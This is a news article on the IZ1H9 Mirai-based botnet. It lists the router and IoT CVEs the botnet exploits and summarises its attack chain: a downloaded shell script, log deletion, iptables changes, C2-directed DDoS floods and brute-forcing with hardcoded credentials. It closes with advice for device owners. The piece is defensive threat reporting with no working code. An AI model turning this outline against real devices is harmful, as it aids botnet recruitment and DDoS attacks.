Mirai DDoS Malware Variant Expands ,Targets with 13 Router Exploits
A recent cybersecurity report has unveiled the resurgence of a Mirai-based DDoS (distributed denial of service) malware botnet known as IZ1H9.This botnet has taken an alarming turn by incorporating new tactics, techniques, and targets.
This includes Linux-based routers and those from well-known brands such as D-Link, Zyxel, TP-Link, TOTOLINK, and others.The IZ1H9 botnet's expansion demonstrates its evolution toward a more versatile and potent threat, presenting a significant challenge for cybersecurity experts.
Peak in Exploitation RatesFortinet researchers identified a disturbing spike in the exploitation rates associated with the IZ1H9 botnet during the first week of September.Thousands of exploitation attempts were recorded during this period as the malware sought to compromise vulnerable devices.
Notably, the effectiveness of DDoS malware is directly linked to the diversity of devices it can exploit and vulnerabilities it can target.So, the botnet's primary objective is to recruit these compromised devices to join its DDoS swarm. This allows it to launch large-scale DDoS attacks on specific targets.
In the case of IZ1H9, it employs a variety of exploits to target numerous devices, some of which date back to 2015. Some of the vulnerabilities it leverages include:
- D-Link devices: CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, CVE-2021-45382
- Netis WF2419: CVE-2019-19356
- Sunhillo SureLine (versions before 8.7.0.1.1): CVE-2021-36380
- Geutebruck products: Multiple CVEs
- Yealink Device Management (DM) 3.6.0.20: Multiple CVEs
- Zyxel EMG3525/VMG1312 (before V5.50): CVE not specified
- TP-Link Archer AX21 (AX1800): CVE-2023-1389
- Korenix JetWave wireless AP: CVE-2023-23295
- TOTOLINK routers: Multiple CVEsUnspecified CVE related to the CGI-bin/login.cgi" route
This extensive targeting of devices and vulnerabilities enhances the botnet's potential to assemble a powerful and vast network.This network is capable of delivering devastating blows to targeted websites and services.
The Attack Chain and IZ1H9's Modus OperandiThe IZ1H9 botnet follows a systematic sequence of actions for compromising devices and integrating them into its network. It exploits known vulnerabilities, called CVEs, to gain unauthorized access to the targeted device.
Once inside, the botnet injects a payload into the compromised device.This contains a command that prompts the device to download a shell script named l.sh" from a specific URL. This script then executes, deleting log files to hide its malicious activities and allowing it to operate covertly.
Subsequently, the compromised device fetches bot clients customized for various system architectures.The script also modifies the device's Iptables rules to obstruct incoming connections on specific ports, making it challenging to remove the malware.
The compromised device communicates with a Command and Control (C2) server, awaiting instructions. When directed by the C2 server, the botnet can execute different DDoS attacks, including UDP, UDP Plain, HTTP Flood, and TCP SYN.
Furthermore, the IZ1H9 botnet includes hardcoded credentials that can be employed for brute-force attacks.This aids its expansion to adjacent devices or enables authentication to IoT devices for which it lacks a functioning exploit.
So, to protect against this evolving threat, owners of IoT devices are advised to strengthen their security measures by using robust administrator credentials.
They should regularly update their devices with the latest firmware versions, often including essential security patches. This will minimize their devices' exposure to the public internet and reduce the risk of exploitation.
The post Mirai DDoS Malware Variant Expands ,Targets with 13 Router Exploits appeared first on The Tech Report.